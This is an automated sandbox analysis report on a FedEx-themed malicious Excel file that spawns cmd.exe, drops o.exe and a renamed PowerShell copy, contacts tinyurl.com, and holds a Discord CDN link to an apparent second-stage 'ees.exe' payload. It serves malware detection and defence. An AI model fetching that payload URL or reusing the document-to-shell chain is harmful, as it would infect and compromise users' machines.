Analysis Report 1099008FEDEX_090887766.xls

AV Detection:

Multi AV Scanner detection for submitted file

Source: 1099008FEDEX_090887766.xls

ReversingLabs: Detection: 14%

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

14_2_0125C197

Enumerates the file system

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe			Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: tinyurl.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

Networking:

Connects to a URL shortener service

Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 104.20.138.65 104.20.138.65

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: tinyurl.com

Urls found in memory or binary data

Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: o.exe, 00000011.00000003.407523508.0000000007AEE000.00000004.00000001.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
Source: o.exe, 00000011.00000002.413694833.00000000008C5000.00000004.00000020.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngd
Source: o.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: vc.exe.14.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: o.exe, 00000011.00000003.405026738.0000000008D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.co.
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.office.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://augloop.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393
Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393$
Source: o.exe, 0000000E.00000002.396972338.0000000005536000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/7706291313930
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393171507/778732067705454592/ees.exe
Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com4
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.entity.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cortana.ai
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://cr.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://directory.services.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pesterd
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.windows.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.local
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://management.azure.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://management.azure.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: o.exe, 0000000E.00000002.397281836.00000000055A8000.00000004.00000001.sdmp, o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
